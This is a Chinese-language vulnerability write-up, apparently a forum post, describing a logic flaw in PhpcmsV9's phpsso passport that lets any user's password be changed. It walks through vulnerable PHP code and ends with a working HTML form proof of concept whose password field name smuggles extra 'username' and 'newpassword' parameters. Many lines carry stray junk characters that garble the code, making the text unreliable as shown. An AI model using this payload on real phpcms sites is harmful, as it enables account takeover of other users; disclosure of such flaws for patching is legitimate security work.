PhpcmsV9 任意用户密码修改逻辑漏洞 2013年贺岁第三发

admin

提到的通行证的代码：

( B/ M9 U2 p2 \9 q) M% {5 c
+ d3 m% S& p7 I" c! A& l+ U" O0 p6 Pparse_str(sys_auth($_POST['data'], 'DECODE', $this->applist[$this->appid]['authkey']), $this->data);
0 Z3 y6 ?6 q; b6 D" c& j) w
8 R& m$ G0 X( i; s# M$ ]在phpsso_server/phpcms/modules/phpsso/classes/phpsso.class.php中。
0 w4 e( [1 r0 ]2 p+ T
我把它留给了你们。
, w% H" U* u+ b: g& ^6 y; b不知道你们发现了它没有。

, T: y4 G# I: Y我们知道parse_str类似将http请求转换成php变量的函数，所以，也像http请求在php的环境下一样，如果提交?a=sss&a=aaa，那么a的结果会是aaa，不是sss。

! K; a6 w6 @- I3 ]3 f所以我们知道这个函数有一个问题了，如果后面提交一个内容，它会覆盖前面的。

也就是

5 L; u6 Y( C9 Y; B& J/ z3 q" X6 _username=zhangsan&username=lisi的话，那么用户名就不是zhangsan了。
$ ~, ~+ g$ g% G+ J( R- ?* M
要构造这样的请求，我们还是要回到通行证的client看看，我们有没有这样的机会。
: w, D) p  b4 n
, k2 n, Q) [& I6 N9 y
  \1 Y- `7 v* _1 W* [4 ?7 i其实我们有这样的机会，看看代码，如下：

: b2 S" Z% S/ L: [- X- R3 a6 w* m
+ {+ S8 R; @6 V6 v- P" Tpublic function auth_data($data) {
                $s = $sep = '';
                foreach($data as $k => $v) {
$ f% @& ]8 ^) ?. h                        if(is_array($v)) {
' Y5 U0 _7 D; c                                $s2 = $sep2 = '';
                                foreach($v as $k2 => $v2) {
. K+ U$ S+ W- u- `                                                $s2 .= "$sep2{$k}[$k2]=".$this->_ps_stripslashes($v2);
0 @7 E( s3 b) U6 v) D                                        $sep2 = '&';
. q) z" _7 u4 ?                                }
. j2 E: m7 ^* R6 \' G6 L" u                                $s .= $sep.$s2;
! H; `% U* n. v                        } else {
* \  N3 V0 n  k, a! ~/ t2 b                                $s .= "$sep$k=".$this->_ps_stripslashes($v);
                        }
                        $sep = '&';
* `. ^8 u$ [+ [3 x5 Y! \                }

                $auth_s = 'v='.$this->ps_vsersion.'&appid='.APPID.'&data='.urlencode($this->sys_auth($s));
, l5 X, L3 J6 J                return $auth_s;
+ ]0 l7 P+ }# J' R( x6 j+ P% k        }

可能我没说明白，对，传递进来的数组的key是可控的。如果我的key里包含[]&这样三个字符的话，那么我就能重写这样的东西。
- \7 r) Z7 c5 N2 Y5 a- g# Z" f
举个例子

. v; V5 X( L+ d* }$a[aaa=a&bbb] = 'a';
/ v8 [2 `- ~/ J% W6 x+ o
会变成aaa=a&bbb=a
3 j/ n2 I- ]5 w  `
明白了么，对，就是通过没有注意到的key，我们可以构造出多余的参数来。
8 X& M. Z) D; {" T$ i" t; K, b
这个时候，我们可以再去看一个函数。
; A/ M5 H6 ^4 ]/ B6 h& N
就在这个文件内：
& r& i% ], E2 q. D$ k
) m7 Y) L! }6 p- ~$ O( c6 u& @
+ m( S- s" v) J% h3 r* y" [5 Wpublic function ps_member_edit($username, $email, $password='', $newpassword='', $uid='', $random='') {
                if($email && !$this->_is_email($email)) {
" y+ C% T& L. c# x2 K. Q                        return -4;
                }
                return $this->_ps_send('edit', array('username'=>$username, 'password'=>$password, 'newpassword'=>$newpassword, 'email'=>$email, 'uid'=>$uid, 'random'=>$random));
        }
8 e) n3 v( C* z* w3 z( p
这是向通行证发了这样一个请求。

我们再跟到通信证代码里去看看，就会有所发现。


( Z) o1 V$ y: A# N3 [# c7 g' T/ zpublic function edit() {
- i8 k  U! i; [0 `; `/ [//能省就省，太长了不是吗？
  I$ @: h, N% z3 S
if($this->username) {
* p4 H7 L  Y) E//如果提交了用户名，则按照用户名修改记录，反之，按照uid来修改记录。
$ N" a. m% l1 ^; Q                                $res = $this->db->update($data, array('username'=>$this->username));
% }* `+ }' V- C' l                        } else {
% ]$ D) e5 k; Y: f" g. s: ^                                file_put_contents('typeb.txt',print_r($data,1).$this->uid);
                                $res = $this->db->update($data, array('uid'=>$this->uid));
                        }
: z- U- F' J- L  N' l6 z
好，我们知道了，如果提交了用户名，就会按照用户名来修改记录，不然就按照uid，我们看看函数结构：

/ S# j3 X# K/ Wpublic function ps_member_edit($username, $email, $password='', $newpassword='', $uid='', $random='')
7 X7 Q5 q" N- O
' e% a3 Y$ l4 }, S# r很好，uid要是无法控制的话，后面只剩下一个random了，但是username就在第一个，只要email，password，newpassword，有任何一个可以控制，就可以修改密码了。

  i" u) g( j# g$ s& g) y" t我当然找到了：
- O4 p; O/ {5 g" B/ |phpcms9/phpcms/modules/member/index.php
6 |) ]/ _8 T! p$ p
$res = $this->client->ps_member_edit('', $email, $_POST['info']['password'], $_POST['info']['newpassword'], $this->memberinfo['phpssouid'], $this->memberinfo['encrypt']);

# i4 z( V5 w7 F5 w然后就没有然后了。
2 Z+ d2 f# E( j8 h
. y0 Z3 F$ L$ l<form method="post" action="http://localhost/phpcms9/index.php?m=member&c=index&a=account_manage_password&t=1" id="myform" name="myform">
                                <table width="100%" cellspacing="0" class="table_form">
                                        <tr>
                                                <th width="80">邮箱：</th>        
# S& U8 J2 f0 u& _  U, d                                                <td><input name="info[email]" type="text" id="email" size="30" value="jj@jj.com" class="input-text"></td>
. A) U* m9 p1 J1 p7 O                                        </tr>
3 G4 r* i! N4 H                                        <tr>
) J- S! H; n5 i8 Q                                                <th width="80">原密码：</th>        
, H* y, Y0 d! g+ W9 a1 r                                                <td><input name="info[password]" type="password" id="password" size="30" value="111111" class="input-text"></td>
; |% L7 O! q5 [/ `8 o                                        </tr>
+ Z) o/ J) \: G5 F6 R9 k2 [, @                                        <tr>
                                                <th>新密码：</th>
                                                <td><input name="info[newpassword][%5D=aaa%5D%5B&username=cc&newpassword=aaaaaa&]" type="password" id="newpassword" size="30" value="" class="input-text"></td>
$ k3 w  Y9 ~2 n4 ~' h                                        </tr>
1 C$ N: v' L; l  C5 |5 F6 T4 o. M                                        <th></th>
5 x! A: [6 O" L0 s0 X- I1 v' y                                        <td><input name="dosubmit" type="submit" id="dosubmit" value="提交" class="button"></td>
2 {( V5 H# D( C. K5 k( C" b6 J                                        </tr>
6 ~+ s$ J7 ^) E' F2 z( I, ]                                </table>
& D& Z# j. e) _$ Q/ l
                               
6 q! N  _, B! t' I7 C                        </form>